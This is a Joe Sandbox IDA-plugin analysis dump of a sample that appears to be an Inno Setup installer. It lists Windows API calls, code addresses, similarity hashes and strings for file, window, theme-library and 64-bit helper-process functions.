                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                                    • String ID:
                                                                                    • API String ID: 1039859321-0
                                                                                    • Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                                    • Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
                                                                                    • Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                                    • Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                    • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                                    • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                    • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                                    APIs
                                                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                    • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                                    • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                    • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                    • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                    • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                    • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                                    • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                                    • Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                                    • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                                    • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                                    • Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                                    • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                                    APIs
                                                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FormatMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1306739567-0
                                                                                    • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                    • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                                    • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                    • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                                    APIs
                                                                                    • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AFAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExtentPointText
                                                                                    • String ID:
                                                                                    • API String ID: 566491939-0
                                                                                    • Opcode ID: 90a462693412dbe2d3701b4a638a08269245f99a520fb20ced4cfa3a60c0f726
                                                                                    • Instruction ID: 521e336bb4068398e137653e65768ba8fc8edf3c24fac2dc391ef4baa913583b
                                                                                    • Opcode Fuzzy Hash: 90a462693412dbe2d3701b4a638a08269245f99a520fb20ced4cfa3a60c0f726
                                                                                    • Instruction Fuzzy Hash: 3BE086F13096106B9201E67E1D81D9FA7DC8B4D26A714817AF858E73C2D62CDD1A43AE
                                                                                    APIs
                                                                                    • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                    • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                    • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                    • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                    APIs
                                                                                    • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                    • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                                    • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                    • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                                    APIs
                                                                                    • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,0000003C,00000000), ref: 0045412A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 1863332320-0
                                                                                    • Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                                    • Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
                                                                                    • Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                                    • Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
  • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
• ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
  • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
APIs
• SetWindowTextA.USER32(?,00000000), ref: 004242EC
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
APIs
• SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
  • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
APIs
• SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
APIs
• VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
Similarity
• API ID: AllocVirtual
• API String ID: 4275171209-0
APIs
• GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
Similarity
• API ID: ErrorLast
• API String ID: 1452528299-0
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
Similarity
• API ID: FreeVirtual
• API String ID: 1263568516-0
APIs
Similarity
• API ID: CloseHandle
• API String ID: 2962429428-0
APIs
  • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
• GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
• GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
• GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
• GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
• GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
• GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
• GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
• GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
• GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
• GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
• GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
• GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
• GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
• GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
• GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
• GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
• GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
• GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
• GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
• GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
• GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
• GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
• GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
• GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
• GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
• GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
• GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
• GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
• GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
• GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
• GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
• GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
• GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
• GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
• GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
• GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
• GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
• GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
• GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
Strings
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
• API String ID: 1968650500-2910565190
APIs
• GetTickCount.KERNEL32 ref: 00457D4F
• QueryPerformanceCounter.KERNEL32(02193858,00000000,00457FE2,?,?,02193858,00000000,?,004586DE,?,02193858,00000000), ref: 00457D58
• GetSystemTimeAsFileTime.KERNEL32(02193858,02193858), ref: 00457D62
• GetCurrentProcessId.KERNEL32(?,02193858,00000000,00457FE2,?,?,02193858,00000000,?,004586DE,?,02193858,00000000), ref: 00457D6B
• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
• GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02193858,02193858), ref: 00457DEF
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
• CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
• CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
Strings
Similarity
• API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
• String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
• API String ID: 770386003-3271284199
APIs
  • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
  • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
  • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
  • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC), ref: 00476E74
